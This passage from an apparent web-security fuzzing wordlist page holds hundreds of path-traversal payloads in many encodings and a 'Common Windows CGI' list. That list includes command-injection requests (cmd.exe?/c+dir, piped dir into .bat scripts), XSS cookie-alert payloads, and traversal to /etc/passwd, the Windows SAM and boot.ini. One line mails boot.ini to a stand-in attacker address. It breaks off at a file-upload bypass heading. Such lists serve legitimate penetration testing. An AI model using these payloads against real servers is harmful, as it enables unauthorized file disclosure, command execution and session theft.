..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
///%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
\\\%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..//{FILE}&lt;br /&gt;
..//..//{FILE}&lt;br /&gt;
..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
..///..///{FILE}&lt;br /&gt;
..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..\\{FILE}&lt;br /&gt;
..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
./\/./{FILE}&lt;br /&gt;
./\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
./../{FILE}&lt;br /&gt;
./.././../{FILE}&lt;br /&gt;
./.././.././../{FILE}&lt;br /&gt;
./.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././.././../{FILE}&lt;br /&gt;
.\..\{FILE}&lt;br /&gt;
.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.//..//{FILE}&lt;br /&gt;
.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../..//{FILE}&lt;br /&gt;
../..//../{FILE}&lt;br /&gt;
../..//../..//{FILE}&lt;br /&gt;
../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//{FILE}&lt;br /&gt;
../..//../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//../..//{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\\{FILE}&lt;br /&gt;
..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
../..///{FILE}&lt;br /&gt;
../..//..///{FILE}&lt;br /&gt;
../..//../..///{FILE}&lt;br /&gt;
../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..///{FILE}&lt;br /&gt;
../..//../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..//../..///{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\..\\\{FILE}&lt;br /&gt;
..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Common Windows CGI   (Update: 17 March 2010 &lt;br /&gt;
# fuzz inside executable directories&lt;br /&gt;
# on windows, this is usually /scripts or /cgi-bin&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
cart32.exe&lt;br /&gt;
get32.exe&lt;br /&gt;
visadmin.exe&lt;br /&gt;
foxweb.exe&lt;br /&gt;
webplus.exe?about&lt;br /&gt;
fpsrvadm.exe&lt;br /&gt;
MsmMask.exe&lt;br /&gt;
cmd.exe?/c+dir&lt;br /&gt;
cmd1.exe?/c+dir&lt;br /&gt;
post32.exe|dir%20c:\\&lt;br /&gt;
cgitest.exe&lt;br /&gt;
hpnst.exe?c=p+i=&lt;br /&gt;
Pbcgi.exe&lt;br /&gt;
testcgi.exe&lt;br /&gt;
webfind.exe?keywords=01234567890123456789&lt;br /&gt;
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C&lt;br /&gt;
test-cgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
athcgi.exe?command=showpage&amp;amp;script='],[0,0]];alert('Vulnerable');a=[['&lt;br /&gt;
mkilog.exe&lt;br /&gt;
mkplog.exe&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
perl.exe?-v&lt;br /&gt;
perl.exe&lt;br /&gt;
ppdscgi.exe&lt;br /&gt;
c32web.exe/ChangeAdminPassword&lt;br /&gt;
windmail.exe&lt;br /&gt;
dbmlparser.exe&lt;br /&gt;
cgimail.exe&lt;br /&gt;
minimal.exe&lt;br /&gt;
rguest.exe&lt;br /&gt;
visitor.exe&lt;br /&gt;
webbbs.exe&lt;br /&gt;
wguest.exe&lt;br /&gt;
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15&lt;br /&gt;
cfgwiz.exe&lt;br /&gt;
Cgitest.exe&lt;br /&gt;
mailform.exe&lt;br /&gt;
post16.exe&lt;br /&gt;
imagemap.exe&lt;br /&gt;
htimage.exe/path/filename?2,2&lt;br /&gt;
htimage.exe&lt;br /&gt;
Webnews.exe&lt;br /&gt;
texis.exe/junk&lt;br /&gt;
apexec.pl?etype=odp&amp;amp;template=../../../../../../../../../../etc/passwd%00.html&amp;amp;passurl=/category/&lt;br /&gt;
sensepost.exe?/c+dir&lt;br /&gt;
testcgi.exe&lt;br /&gt;
testcgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
ion-p.exe?page=c:\winnt\repair\sam&lt;br /&gt;
../../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf &lt;br /&gt;
foxweb.dll&lt;br /&gt;
wconsole.dll&lt;br /&gt;
shtml.dll&lt;br /&gt;
scripts/slxweb.dll/getfile?type=Library&amp;amp;file=[invalid filename]&lt;br /&gt;
rightfax/fuwww.dll/?&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\&lt;br /&gt;
GW5/GWWEB.EXE&lt;br /&gt;
GW5/GWWEB.EXE?GET-CONTEXT&amp;amp;HTMLVER=AAA&lt;br /&gt;
GW5/GWWEB.EXE?HELP=bad-request&lt;br /&gt;
GWWEB.EXE?HELP=bad-request&lt;br /&gt;
echo.bat&lt;br /&gt;
echo.bat?&amp;amp;dir+c:\\&lt;br /&gt;
hello.bat?&amp;amp;dir+c:\\&lt;br /&gt;
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
input2.bat?|dir&lt;br /&gt;
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
test-cgi.bat&lt;br /&gt;
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass (Update: 17 March 2010 - notes only) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
